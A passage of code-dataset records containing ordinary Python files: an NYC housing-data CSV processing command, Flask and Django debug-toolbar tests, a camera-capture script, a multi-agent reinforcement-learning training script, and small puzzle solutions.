'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(col0, boro1, building_id2, block3, lot4, issue_date5, viol_type_code6, violation_number7, house_number8, street9, disposition_date10, disp_comments11, device_number12, description13, ecb_number14, number15, violation_category16, violation_type17) = row\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\thouse_number = str(row[8]).strip()\n\t\t\tstreetname = str(row[9]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tboro = str(row[1]).strip()\n\t\t\tblock = str(row[3]).strip()\n\t\t\tlot = str(row[4]).strip()\n\t\t\tboroughs = ['MANHATTAN', 'BRONX', 'BROOKLYN', 'QUEENS', 'STATEN ISLAND']\n\t\t\ttry:\n\t\t\t\tborough = boroughs[int(boro) - 1]\n\t\t\texcept ValueError:\n\t\t\t\tborough = 'NA'\n\t\t\t\tpass\n\t\t\ttry:\n\t\t\t\taddress_list = (house_number, streetname, boro)\n\t\t\t\t#address_row = (building_id, address)\n\t\t\t\taddresses.writerow(address_list)\n\t\t\texcept TypeError:\n\t\t\t\tpass\n\t\t\tdob_violation_number = str(row[7]).strip()\n\t\t\tviolation_type_code = str(row[6]).strip()\n\t\t\tviolation_category = str(row[16]).strip()\n\t\t\tissue_date = str(row[5]).strip()\n\t\t\tissue_year = issue_date[:4]\n\t\t\tissue_month = issue_date[4:6]\n\t\t\tissue_day = issue_date[6:8]\n\t\t\tdescription = str(row[13]).strip()\n\t\t\tcommunity_board = 'NA'\n\t\t\tnew_row = (issue_date, building_id, house_number, streetname, borough, dob_violation_number, boro+block+lot, violation_type_code, violation_category, issue_year, issue_month, description)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_complaints(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(complaint_number0, status1, date_entered2, house_number3, house_street4, building_id5, community_board6, special_district7, complaint_category8, unit9, disposition_date10, disposition_code11, inspection_date12, dob_run_date13) = row\n\t\t\tbuilding_id = str(row[5]).strip()\n\t\t\thouse_number = str(row[3]).strip()\n\t\t\tstreetname = str(row[4]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tborough='NA'\n\t\t\tboro='NA'\n\t\t\tblock='NA'\n\t\t\tlot='NA'\n\t\t\tcommunity_board = str(row[6]).strip()\n\t\t\tcomplaint_category_number = str(row[8]).strip()\n\t\t\tcomplaint_number = str(row[0]).strip()\n\t\t\tdate_entered = str(row[13]).strip()\n\t\t\tmonth_entered = date_entered[:2]\n\t\t\tday_entered = date_entered[3:5]\n\t\t\tyear_entered = date_entered[6:10]\n\t\t\tinspection_date =str(row[12]).strip()\n\t\t\tunit = str(row[9]).strip()\n\t\t\tnew_row = (date_entered, building_id, complaint_category_number, complaint_number, month_entered, year_entered, house_number, streetname, inspection_date, unit)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_work_permits(file_name, new_file_name):\n\t\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\t#next(reader_object)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\t\t\n\t\t\ttry:\t\t\n\t\t\t\t(borough0, building_id1, house_number2, street3, jobnumber4, jobdocnumber5, jobtype6, self_cert7, block8, lot9, community_board10, zip_code11, bldg_type12, residential13, special_district114, special_district15, work_type16, permit_status17, filing_status18, permit_type19, permit_sequence_number20, permit_subtype21, oil_gas22, site_fill23, filing_date24, issuance_date25, expiration_date26, job_start_date27, permittee_first_name28, permittee_last_name29, permittee_business_name30, permittee_phone31, permittee_license_type32, permittee_license_number33, blank34, blank35, blank36, blank37, blank38, blank39, blank40, blank41, owner_bus_type42, non_profit43, owner_business_name44, owner_first_name45, owner_last_name46, owner_house_number47, owner_street_name48, owner_city49, owner_state50, owner_zip_code51, owner_phone52, dob_run_date53) = row\n\t\t\texcept ValueError:\n\t\t\t\tprint(row)\n\t\t\tbuilding_id = str(row[1]).strip()\n\t\t\tcommunity_board = str(row[10]).strip()\n\t\t\tborough = str(row[0]).strip()\n\t\t\tboroughs = ['MANHATTAN', 'BRONX', 'BROOKLYN', 'QUEENS', 'STATEN ISLAND']\n\t\t\ttry:\n\t\t\t\tboro = str(boroughs.index(borough) + 1)\n\t\t\texcept ValueError:\n\t\t\t\tboro = str(0)\n\t\t\t\tpass\n\t\t\thouse_number = str(row[2]).strip()\n\t\t\tstreetname = str(row[3]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\tzip_code = str(row[11]).strip()\n\t\t\taddress_list = (str(row[2]).strip(), str(row[3]).strip(), str(row[0]).strip(), zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\t\t\t\n\t\t\tdate_entered = str(row[25]).strip()\n\t\t\tmonth_entered = date_entered[:2]\n\t\t\tday_entered = date_entered[3:5]\n\t\t\tyear_entered = date_entered[6:10]\n\t\t\twork_type = str(row[16]).strip()\n\t\t\tpermit_license_type = str(row[19]).strip()\n\t\t\t\n\t\t\tpermit_filing_date = str(row[24]).strip()\n\t\t\tpermit_subtype = str(row[21]).strip()\n\t\t\tfiling_status = str(row[18]).strip()\n\t\t\texpiration_date = str(row[26]).strip()\n\t\t\tpermittees_business_name = str(row[30]).strip()\n\t\t\tjob_start_date = str(row[27]).strip()\n\t\t\tjob_number = str(row[4]).strip()\n\t\t\tnew_row = (date_entered, building_id, borough, house_number, streetname, boro+block+lot, year_entered, month_entered, zip_code, job_start_date, job_number, work_type, permit_license_type, permit_filing_date, permit_subtype, filing_status, expiration_date, permittees_business_name)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef process_hpd_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(violation_id0, building_id1, registration_id2, boro_id3, boro4, house_number5, lowhousenumber6, highhousenumber7, streetname8, streetcode9, zipcode10, apt_number11, story12, block13, lot14, class15, inspection_date16, approved_date17, originalcertifybydate18, originalcorrectbydate19, newcertifybydate20, newcorrectbydate21, certifieddate22, ordernumber23, novid24, novdescription25, novissuedate26, currentstatusid27, currentstatus28, currentstatusdate29) = row\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreetname = str(row[8]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\tzip_code = str(row[10]).strip()\n\t\t\tboro = str(row[3]).strip()\n\t\t\tblock = str(row[13]).strip()\n\t\t\tlot = str(row[14]).strip()\n\t\t\t#no building ID number so setting it to 00000 for now in addresses file\n\t\t\t#building_id = '0'\n\t\t\taddress_list = (house_number, streetname, borough, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\tcurrent_status = str(row[28]).strip()\n\t\t\tcurrent_status_date = str(row[29]).strip()\n\t\t\t#HPD-specific building ID\n\t\t\thpd_building_id = str(row[1]).strip()\n\t\t\tapartment_number = str(row[11]).strip()\n\t\t\tviolation_description = str(row[25]).strip()\n\t\t\tviolation_id = str(row[0]).strip()\n\t\t\tnotice_of_violation_id = str(row[24]).strip()\n\t\t\tnotice_of_violation_date = str(row[26]).strip()\n\t\t\tnov_month = notice_of_violation_date[:2]\n\t\t\tnov_day = notice_of_violation_date[3:5]\n\t\t\tnov_year = notice_of_violation_date[6:10]\n\t\t\tcommunity_board = 'NA'\n\t\t\tbuilding_id = 'NA'\n\t\t\tnew_row = (notice_of_violation_date, hpd_building_id, house_number, streetname, borough, community_board, boro+block+lot, zip_code, current_status, current_status_date, apartment_number, violation_description, violation_id, nov_month, nov_year, notice_of_violation_id)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_hpd_complaints(file_name, new_file_name):\n\t\"\"\"HPD complaints are connected by foreign key complaint_id to HPD complaint problems dataset\n\t\"\"\"\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(complaint_id0, building_id1, borough_id2, borough3, housenumber4, streetname5, zipcode6, block7, lot8, apt_number9, communityboard10, receiveddate11, statusid12, status13, statusdate14) = row\n\t\t\thouse_number = str(row[4]).strip()\n\t\t\tstreetname = str(row[5]).strip()\n\t\t\tborough = str(row[3]).strip()\n\t\t\tzip_code = str(row[6]).strip()\n\t\t\tboro = str(row[2]).strip()\n\t\t\tblock = str(row[7]).strip()\n\t\t\tlot = str(row[8]).strip()\n\t\t\t#no building ID number so setting it to 00000 for now in addresses file\n\t\t\tbuilding_id = 'NA'\n\t\t\taddress_list = (house_number, streetname, boro, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\thpd_building_id = str(row[1]).strip()\n\t\t\tcomplaint_id = str(row[0]).strip()\n\t\t\tapartment_number = str(row[9]).strip()\n\t\t\treceived_date = str(row[11]).strip()\n\t\t\treceived_month = received_date[:2]\n\t\t\tnov_day = received_date[3:5]\n\t\t\treceived_year = received_date[6:10]\n\t\t\tstatus = str(row[13]).strip()\n\t\t\tstatus_date = str(row[14]).strip()\n\t\t\tcommunity_board = str(row[10]).strip()\n\t\t\tzip_code = 'NA'\n\t\t\tnew_row = (received_date, complaint_id, hpd_building_id, boro+block+lot, house_number, streetname, zip_code, apartment_number, received_month, received_year, status, status_date)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + '/restructured_data/%s' % new_file_name\n\ndef hpd_complaint_problems_data(file_name, new_file_name):\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(problem_id0, complaint_id1, unittypeid2, unittype3, spacetypeID4, spacetype5, typeID6, type7, majorcategoryID8, majorcategory9, minorcategory_id_10, minorcategory_11, code_id_12, code_13, status_id_14, status_15, status_date_16, status_description_17) = row\n\t\t\tmajor_category = str(row[9]).strip()\t\t\t\n\t\t\tcomplaint_id = str(row[1]).strip() \n\t\t\tproblem_id = str(row[0]).strip()\n\t\t\tunit_type = str(row[3]).strip()\n\t\t\tspace_type = str(row[4]).strip()\n\t\t\tminor_category = str(row[11]).strip()\n\t\t\thpd_code = str(row[13]).strip()\n\t\t\tstatus = str(row[15]).strip()\n\t\t\tstatus_date = str(row[16]).strip()\n\t\t\tviolation_issued = str(row[17]).strip()\n\t\t\tnew_row = (complaint_id, problem_id, unit_type, space_type, major_category, minor_category, hpd_code, status, status_date, violation_issued)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef open_market_order_data(file_name, new_file_name):\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f:\n\t\twriter = csv.writer(write_file)\n\t\treader_object = csv.reader(f)\n\t\tnext(reader_object)\n\t\theader_row = ('omo_year', 'omo_month', 'building_id', 'bbl', 'borough', 'house_number', 'street_name', 'apartment', 'zip_code', 'omo_id', 'omo_number', 'work_type_general', 'omo_status_reason', 'omo_create_date', 'omo_description')\n\t\twriter.writerow(header_row)\n\t\tfor row in reader_object:\n\t\t\tomo_id = str(row[0]).strip()\n\t\t\tomo_number = str(row[1]).strip()\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\tboro_id = str(row[3]).strip()\n\t\t\tblock = str(row[9]).strip()\n\t\t\tlot = str(row[10]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreet_name = str(row[6]).strip()\n\t\t\tapartment = str(row[7]).strip()\n\t\t\tzip_code = str(row[8]).strip()\n\t\t\twork_type_general = str(row[12]).strip()\n\t\t\tomo_status_reason = str(row[13]).strip()\n\t\t\tomo_create_date = str(row[15]).strip()\n\t\t\tomo_month = omo_create_date[:2]\n\t\t\tomo_day = omo_create_date[3:5]\n\t\t\tomo_year = omo_create_date[6:]\n\t\t\tomo_description = str(row[23]).strip()\n\t\t\tnew_row = (omo_year, omo_month, building_id, boro_id+block+lot, borough, house_number, street_name, apartment, zip_code, omo_id, omo_number, work_type_general, omo_status_reason, omo_create_date, omo_description)\n\t\t\twriter.writerow(new_row)\n\treturn\n\n\nclass Command(BaseCommand):\n\n\tdef handle(self, *args, **options):\n\t\t\"\"\"\n\t\tprint(\"processing HPD complaint problems data...\")\n\t\thpd_complaint_problems = hpd_complaint_problems_data('hpd_complaint_probs.csv', 'hpd_complaint_probs.csv')\n\t\tprint(\"processing HPD complaints data...\")\n\t\thpd_complaints = process_hpd_complaints('HPDcomplaints.csv', 'hpd_complaints.csv')\n\t\tprint(\"processing HPD violations data...\")\n\t\t\n\t\thpd_violations = process_hpd_violations('hpd_violations.csv', 'hpd_violations.csv')\n\t\tprint(\"processing DOB work permits data...\")\n\t\tdob_work_permits = process_dob_work_permits('DOB_Permit_Issuance.csv', 'work_permits.csv')\n\t\tprint(\"processing DOB Complaints data...\")\n\t\t\n\t\tdob_complaints = process_dob_complaints('DOB_Complaints_Received.csv', 'dob_complaints_received.csv')\n\t\tprint(\"processing DOB violations data...\")\n\t\tdob_violations = process_dob_violations('DOB_Violations.csv', 'dob_violations.csv')\n\t\tprint(\"processing DOB ECB violations data...\")\n\t\tecb_violations = process_ecb_violations('DOB_ECB_Violations.csv', 'dob_ecb_violations.csv')\n\t\tprint(\"processing Handyman Work Order data...\")\n\t\thwos = process_handyman_work_order('hwo.csv', 'handymanWO.csv')\n\t\t\"\"\"\n\t\towos = open_market_order_data('OpenMarketOrderCharges.csv', 'omo.csv')\n\n","sub_path":"analysis/management/commands/all_datasets.py","file_name":"all_datasets.py","file_ext":"py","file_size_in_byte":20839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322275744","text":"#!venv/bin/python\nimport os\nimport unittest\n\nfrom config import basedir\nfrom app import app, db\nfrom app.models import User\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n app.config['TESTING'] = True\n app.config['CSRF_ENABLED'] = False\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'test.db')\n self.app = app.test_client()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_login(self):\n u1 = User(login='adm18@bank.srv', username='adm18')\n db.session.add(u1)\n db.session.commit()\n u2 = User(login='alecx@bank.srv', username='lol')\n\n User.query.filter_by(login=u1.login).first()\n assert User.query.filter_by(login=u1.login).first().id == 1\n assert User.query.filter_by(login=u2.login).first() is None\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90464920","text":"import threading\nimport cv2\nimport os\n\n# Define the thread that will continuously pull frames from the camera\nclass CameraBufferCleanerThread(threading.Thread):\n def __init__(self, camera, name='camera-buffer-cleaner-thread'):\n self.camera = camera\n self.last_frame = None\n super(CameraBufferCleanerThread, self).__init__(name=name)\n self.start()\n\n def run(self):\n while True:\n ret, self.last_frame = self.camera.read()\n\n# Start the camera\ncamera = cv2.VideoCapture(0)\ncamera.set(3,800)\ncamera.set(4,600)\n# Start the cleaning thread\ncam_cleaner = CameraBufferCleanerThread(camera)\ncount = 0\n\n# Use the frame whenever you want\nwhile True:\n if cam_cleaner.last_frame is not None:\n cv2.imshow('The last frame', cam_cleaner.last_frame)\n \n if cv2.waitKey(30) == ord('s'):\n if cam_cleaner.last_frame is not None:\n image_np = cam_cleaner.last_frame\n else:\n ret, image_np = camera.read()\n \n name = 'measure' + str(count) +'.jpg'\n path = '/home/tan/objectTrackingpic/measure/'\n cv2.imwrite(os.path.join(path,name),image_np)\n count += 1\n print('save')\n\n if cv2.waitKey(25) == ord('a'):\n break\n\n\ncv2.destroyAllWindows()\ncamera.release()\n\n","sub_path":"object_tracking/camera_take/scripts/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"318595554","text":"from unityagents import UnityEnvironment\nimport numpy as np\nimport logging\n\n'''Adding the environment This is the start point for training'''\n\nenv = UnityEnvironment(file_name=\"Tennis_Windows_x86_64/Tennis.exe\")\n\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\nenv_info = env.reset(train_mode=True)[brain_name]\nnum_agents = len(env_info.agents)\naction_size = brain.vector_action_space_size\nstates = env_info.vector_observations\nstate_size = states.shape[1]\n\nimport torch\nimport pickle\n\nfrom maddpg import MADDPG\n\nfrom collections import deque\nimport matplotlib.pyplot as plt\nimport time, os\n\nmaddpg = MADDPG(24, 2, 2, 1976)\nscores_max_hist = []\nscores_mean_hist = []\n\nlogger = logging.getLogger(__name__)\n\nf_handle = logging.FileHandler(\"Log_File.txt\")\nf_format = logging.Formatter('%(levelname)s: %(asctime)s %(message)s')\nf_handle.setFormatter(f_format)\nf_handle.setLevel(logging.INFO)\n\nlogger.addHandler(f_handle)\n\ndef maddpg_train(n_episodes=2500):\n\n scores_deque = deque(maxlen=100)\n solved = False\n\n for i_episode in range(n_episodes):\n env_info = env.reset(train_mode=True)[brain_name]\n state = env_info.vector_observations\n scores = np.zeros(num_agents)\n maddpg.reset()\n step = 0\n while True:\n step += 1\n action = maddpg.act(state, i_episode, add_noise=True)\n env_info = env.step(action)[brain_name]\n\n next_state = env_info.vector_observations\n reward = env_info.rewards\n done = env_info.local_done\n\n scores += reward\n\n maddpg.step(i_episode, state, action, reward, next_state, done)\n\n if np.any(done):\n break\n\n state = next_state\n\n score_max = np.max(scores)\n scores_deque.append(score_max)\n score_mean = np.mean(scores_deque)\n\n scores_max_hist.append(score_max)\n scores_mean_hist.append(score_mean)\n\n logger.info('Episode {}\\tAverage Score: {:.2f}'.format(i_episode, score_mean))\n if solved == False and score_mean >= 0.5:\n logger.info('Environment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode, score_mean))\n maddpg.save()\n solved = True\n\n if i_episode % 500 == 0:\n print()\n\nscores = maddpg_train()\n\nwith open('scores.data', 'wb') as filehandle:\n # store the data as binary data stream\n pickle.dump(scores, filehandle)\n\nenv.close()","sub_path":"p3-collabcontrol/Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29101930","text":"import base64\nimport os\nimport requests\nimport re\n\n\ndef test_gcfunction_local(xprocess, localserver, nakaguma_image_path):\n with open(nakaguma_image_path, \"rb\") as f:\n dataurl = 'data:image/png;base64,' + base64.b64encode(f.read()).decode()\n\n # Send HTTP request simulating Pub/Sub message\n # (GCF translates Pub/Sub messages to HTTP requests internally)\n try:\n res = requests.post(\n 'http://127.0.0.1:8080',\n json={'image_url': dataurl}\n )\n res.raise_for_status()\n except Exception as e:\n logfile = open(xprocess.getinfo(localserver).logpath, 'r')\n error_data = os.read(logfile.fileno(), 20000).decode(\"utf-8\")\n print(error_data)\n raise e\n finally:\n xprocess.getinfo(localserver).terminate()\n res = res.json()\n\n # Check server response\n assert 'boxes' in res\n assert 'background' in res\n boxes = res['boxes']\n assert 'mask' in boxes['0']\n assert len(boxes['0']['mask']) > 100\n res = {id: {k: v for k, v in boxes[id].items() if k != 'mask'} for id in boxes}\n print('Boxes: ', boxes)\n assert '0' in boxes\n assert 'left' in boxes['0']\n assert 'top' in boxes['0']\n assert 'width' in boxes['0']\n assert 'height' in boxes['0']\n\n logfile = open(xprocess.getinfo(localserver).logpath, 'r')\n error_data = os.read(logfile.fileno(), 20000).decode(\"utf-8\")\n assert not re.search('Traceback', error_data)\n","sub_path":"test/test_gcfunction.py","file_name":"test_gcfunction.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"238856669","text":"# coding: utf-8\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\nimport unittest\nfrom xml.etree import ElementTree as ET\n\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.test import RequestFactory, TestCase\nfrom django.test.utils import override_settings\n\nfrom debug_toolbar.middleware import DebugToolbarMiddleware, show_toolbar\n\nfrom .base import BaseTestCase\nfrom .views import regular_view\n\ntry:\n from selenium import webdriver\n from selenium.common.exceptions import NoSuchElementException\n from selenium.webdriver.support.wait import WebDriverWait\nexcept ImportError:\n webdriver = None\n\n\nrf = RequestFactory()\n\n\n@override_settings(DEBUG=True)\nclass DebugToolbarTestCase(BaseTestCase):\n\n def test_show_toolbar(self):\n self.assertTrue(show_toolbar(self.request))\n\n def test_show_toolbar_DEBUG(self):\n with self.settings(DEBUG=False):\n self.assertFalse(show_toolbar(self.request))\n\n def test_show_toolbar_INTERNAL_IPS(self):\n with self.settings(INTERNAL_IPS=[]):\n self.assertFalse(show_toolbar(self.request))\n\n def _resolve_stats(self, path):\n # takes stats from Request panel\n self.request.path = path\n panel = self.toolbar.get_panel_by_id('RequestPanel')\n panel.process_request(self.request)\n panel.process_response(self.request, self.response)\n panel.generate_stats(self.request, self.response)\n return panel.get_stats()\n\n def test_url_resolving_positional(self):\n stats = self._resolve_stats('/resolving1/a/b/')\n self.assertEqual(stats['view_urlname'], 'positional-resolving')\n self.assertEqual(stats['view_func'], 'tests.views.resolving_view')\n self.assertEqual(stats['view_args'], ('a', 'b'))\n self.assertEqual(stats['view_kwargs'], {})\n\n def test_url_resolving_named(self):\n stats = self._resolve_stats('/resolving2/a/b/')\n self.assertEqual(stats['view_args'], ())\n self.assertEqual(stats['view_kwargs'], {'arg1': 'a', 'arg2': 'b'})\n\n def test_url_resolving_mixed(self):\n stats = self._resolve_stats('/resolving3/a/')\n self.assertEqual(stats['view_args'], ('a',))\n self.assertEqual(stats['view_kwargs'], {'arg2': 'default'})\n\n def test_url_resolving_bad(self):\n stats = self._resolve_stats('/non-existing-url/')\n self.assertEqual(stats['view_urlname'], 'None')\n self.assertEqual(stats['view_args'], 'None')\n self.assertEqual(stats['view_kwargs'], 'None')\n self.assertEqual(stats['view_func'], '')\n\n # Django doesn't guarantee that process_request, process_view and\n # process_response always get called in this order.\n\n def test_middleware_view_only(self):\n DebugToolbarMiddleware().process_view(self.request, regular_view, ('title',), {})\n\n def test_middleware_response_only(self):\n DebugToolbarMiddleware().process_response(self.request, self.response)\n\n def test_middleware_response_insertion(self):\n resp = regular_view(self.request, \"İ\")\n DebugToolbarMiddleware().process_response(self.request, resp)\n # check toolbar insertion before \"\"\n self.assertContains(resp, '\\n')\n\n def test_cache_page(self):\n self.client.get('/cached_view/')\n self.assertEqual(\n len(self.toolbar.get_panel_by_id('CachePanel').calls), 3)\n self.client.get('/cached_view/')\n self.assertEqual(\n len(self.toolbar.get_panel_by_id('CachePanel').calls), 5)\n\n\n@override_settings(DEBUG=True)\nclass DebugToolbarIntegrationTestCase(TestCase):\n\n def test_middleware(self):\n response = self.client.get('/execute_sql/')\n self.assertEqual(response.status_code, 200)\n\n @override_settings(DEFAULT_CHARSET='iso-8859-1')\n def test_non_utf8_charset(self):\n response = self.client.get('/regular/ASCII/')\n self.assertContains(response, 'ASCII') # template\n self.assertContains(response, 'djDebug') # toolbar\n\n response = self.client.get('/regular/LÀTÍN/')\n self.assertContains(response, 'LÀTÍN') # template\n self.assertContains(response, 'djDebug') # toolbar\n\n def test_xml_validation(self):\n response = self.client.get('/regular/XML/')\n ET.fromstring(response.content) # shouldn't raise ParseError\n\n\n@unittest.skipIf(webdriver is None, \"selenium isn't installed\")\n@unittest.skipUnless('DJANGO_SELENIUM_TESTS' in os.environ, \"selenium tests not requested\")\n@override_settings(DEBUG=True)\nclass DebugToolbarLiveTestCase(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(DebugToolbarLiveTestCase, cls).setUpClass()\n cls.selenium = webdriver.Firefox()\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(DebugToolbarLiveTestCase, cls).tearDownClass()\n\n def test_basic(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('VersionsPanel')\n\n # Versions panel isn't loaded\n with self.assertRaises(NoSuchElementException):\n version_panel.find_element_by_tag_name('table')\n\n # Click to show the versions panel\n self.selenium.find_element_by_class_name('VersionsPanel').click()\n\n # Version panel loads\n table = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_tag_name('table'))\n self.assertIn(\"Name\", table.text)\n self.assertIn(\"Version\", table.text)\n\n @override_settings(DEBUG_TOOLBAR_CONFIG={'RESULTS_CACHE_SIZE': 0})\n def test_expired_store(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('VersionsPanel')\n\n # Click to show the version panel\n self.selenium.find_element_by_class_name('VersionsPanel').click()\n\n # Version panel doesn't loads\n error = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_tag_name('p'))\n self.assertIn(\"Data for this panel isn't available anymore.\", error.text)\n\n @override_settings(TEMPLATE_LOADERS=[(\n 'django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ),\n )])\n def test_django_cached_template_loader(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('TemplatesPanel')\n\n # Click to show the versions panel\n self.selenium.find_element_by_class_name('TemplatesPanel').click()\n\n # Version panel loads\n trigger = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_css_selector(\n '.remoteCall'))\n trigger.click()\n\n # Verify the code is displayed\n WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: self.selenium.find_element_by_css_selector(\n '#djDebugWindow code'))\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10381781","text":"s = input().lower().strip()\ns1 = \"AEIOU\"\nx = s.split()\ni = 0\nfor i in range(len(x)):\n if x[i] not in s1:\n x.insert(i - 1, \".\")\n else:\n x.remove(x[i])\nprint(''.join(x))","sub_path":"Codeforces/118_A_String_Task.py","file_name":"118_A_String_Task.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272101803","text":"class Determiner(object):\n coins = [1, 5, 7, 9, 11]\n\n @staticmethod\n def eval(num):\n coins = Determiner.coins\n\n if num in coins:\n return 1\n\n # minimum number of coins for specific change values x\n min_amounts= [-1] * (num+1)\n\n # zero produces 0 amount of coins\n min_amounts[0] = 0\n\n # G(x) = 1 + min(G(x-i)) for all i in coins if i <= x\n\n for x in range(1, num+1):\n minimum = -1\n for i in coins:\n index = x - i\n if index >= 0:\n if (min_amounts[index] < minimum) or (minimum == -1):\n minimum = 